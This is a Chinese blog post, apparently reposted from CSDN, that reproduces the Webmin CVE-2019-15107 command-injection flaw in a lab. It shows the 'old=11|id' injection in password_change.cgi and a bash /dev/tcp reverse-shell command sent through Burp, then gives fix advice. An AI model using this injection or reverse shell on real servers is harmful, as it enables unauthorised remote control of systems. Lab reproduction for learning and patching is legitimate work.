ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

webmin 远程代码漏洞复现

2021-12-20 13:07:03  阅读:171  来源: 互联网

标签:修改 webmin 漏洞 复现 版本 1.920


漏洞简介

webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关闭密码过期策略时,受漏洞威胁的概率较小,漏洞主要是起代码中引用‘qx/ /’方法,把密码字符串当作命令执行

漏洞环境搭建

Webmin 1.920

kali执行终端命令:wget https://sourceforge.net/projects/webadmin/files/webmin/1.920/webmin_1.920_all.deb/download

或者从vulhub中直接拉取镜像(webmin1.910)

3.1.2.4 漏洞复现

安装webmin1.920,并从其给的提示修改初始密码并登录

设置为允许修改新密码

 

浏览器里打开password_change.cgi,发现提示外部url,并且给出修改提示。

按提示修改

打开burp抓包(webmin的password_change.cgi界面),把抓到的包修改为修改密码的请求包发送到repeater

 

 

尝试反弹shell

将命令 bash -c “bash -i >& /dev/tcp/192.168.202.128/4444 0>&1” 进行url编码

将编码后的数字换到“old=11|id”中的id,然后打开kali监听4444端口,回到burp重新,发送请求包

 

 

 

成功返弹shell

至此漏洞复现成功

 3.1.2.5 修复建议

(1).找到漏洞代码,将,qx/$in{‘old’}/)代码删除

(2)下载最新版本webmin

标签:修改,webmin,漏洞,复现,版本,1.920
来源: https://blog.csdn.net/weixin_54584489/article/details/122020310

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有